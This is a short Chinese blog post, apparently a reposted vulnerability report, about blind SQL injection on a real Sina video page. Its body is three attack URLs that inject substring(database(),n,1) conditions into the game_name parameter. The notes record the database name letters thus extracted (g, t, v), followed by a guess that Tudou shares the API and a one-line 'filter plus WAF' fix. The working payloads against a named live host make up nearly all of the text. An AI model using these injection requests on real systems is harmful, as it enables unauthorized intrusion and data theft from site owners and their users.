新浪某站SQL注入
程序员文章站
2022-04-03 11:07:24
http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and sub...
http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),1,1)='g' and 'x'=‘x
数据库第一位是g
http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),2,1)='t' and 'x'='x
第二位是t
http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),3,1)='v' and 'x'='x
第三位是v
可能是土豆调用了你们的api,可能是通用?
sql注入漏洞修复方案:
过滤+waf
上一篇: PHP使用strtotime获取上个月、下个月、本月的日期
下一篇: 互联网协议入门(一)